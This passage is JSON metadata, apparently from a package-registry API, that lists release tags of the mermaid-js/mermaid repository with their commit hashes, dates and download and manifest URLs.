tags/@mermaid-js%2Fmermaid-zenuml@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2/manifests"},{"name":"mermaid@11.9.0","sha":"767754f4fbfe22e74e0612c5d684e9b58c3c5caf","kind":"commit","published_at":"2025-07-16T08:25:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0/manifests"},{"name":"@mermaid-js/tiny@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1/manifests"},{"name":"@mermaid-js/parser@0.6.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1/manifests"},{"name":"mermaid@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1/manifests"},{"name":"@mermaid-js/tiny@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0/manifests"},{"name":"mermaid@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0/manifests"},{"name":"@mermaid-js/parser@0.6.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0/manifests"},{"name":"@mermaid-js/parser@0.5.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.8","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8/manifests"},{"name":"mermaid@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0/manifests"},{"name":"@mermaid-js/tiny@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.1","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1/manifests"},{"name":"@mermaid-js/parser@0.4.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0/manifests"},{"name":"mermaid@11.6.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0/manifests"},{"name":"mermaid@11.5.0","sha":"41a737f6821df4cdeab75643984912b82c1dff7a","kind":"tag","published_at":"2025-03-13T10:34:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.7","sha":"becadf0a7de509b6cc81e99a04abfa6cba8e7bfd","kind":"tag","published_at":"2024-11-27T17:15:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7/manifests"},{"name":"@mermaid-js/layout-elk@0.1.6","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6/manifests"},{"name":"mermaid@11.4.1","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1/manifests"},{"name":"mermaid@11.4.0","sha":"56f522ec50b5c746be5532686dd465a06215273d","kind":"tag","published_at":"2024-10-30T15:43:30.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0/manifests"},{"name":"v10.9.3","sha":"85ec96a72d06d45cf5d2b88af6ef0aca2d16c187","kind":"commit","published_at":"2024-10-22T08:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3/manifests"},{"name":"@mermaid-js/layout-elk@0.1.5","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5/manifests"},{"name":"mermaid@11.3.0","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0/manifests"},{"name":"v10.9.2","sha":"4dd4997c4d73784a239bac04deded9ff6866d2b4","kind":"commit","published_at":"2024-10-02T09:31:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2/manifests"},{"name":"mermaid@11.2.1","sha":"d63dc319c7c57a9900932fe4920be6a4e54570d5","kind":"tag","published_at":"2024-09-16T16:41:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1/manifests"},{"name":"@mermaid-js/layout-elk@0.1.4","sha":"9c41708d9e439f4cf82c0c954e6c40217f6754e4","kind":"tag","published_at":"2024-09-09T14:03:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4/manifests"},{"name":"mermaid@11.2.0","sha":"80903ec281db9053486f7dbfeae8430d2618e54d","kind":"tag","published_at":"2024-09-09T13:23:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0/manifests"},{"name":"mermaid@11.1.1","sha":"73147196b11e38bf825df17ca5f319aa54748b90","kind":"tag","published_at":"2024-09-06T17:19:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1/manifests"},{"name":"mermaid@11.1.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.3","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3/manifests"},{"name":"@mermaid-js/parser@0.3.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.2","sha":"95274278f39a31f00188935f3d7d1f0c3ccc607a","kind":"tag","published_at":"2024-08-24T07:21:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2/manifests"},{"name":"mermaid@11.0.2","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2/manifests"},{"name":"@mermaid-js/layout-elk@0.1.1","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1/manifests"},{"name":"@mermaid-js/parser@0.2.0","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0/manifests"},{"name":"mermaid@11.0.1","sha":"4d10e3f2586fb8b08b72d93a1036a17d53153997","kind":"tag","published_at":"2024-08-23T15:04:26.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1/manifests"},{"name":"v11.0.0","sha":"2cfdd1620a8ceef37c0b738569dfb8bcc0005547","kind":"commit","published_at":"2024-08-23T12:07:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v11.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v11.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v11.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0/manifests"},{"name":"v10.9.1","sha":"dab26df9c4ca69cc4a8c46a22286a2f63ea9ed3e","kind":"commit","published_at":"2024-05-14T10:55:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1/manifests"},{"name":"v10.9.0","sha":"da33867ad798872d9f8406532263ff5e569f1185","kind":"commit","published_at":"2024-03-05T17:22:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0/manifests"},{"name":"v10.8.0","sha":"51e7444b94ab0b872eaabc3b138184b47442fab4","kind":"commit","published_at":"2024-02-02T10:10:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0/manifest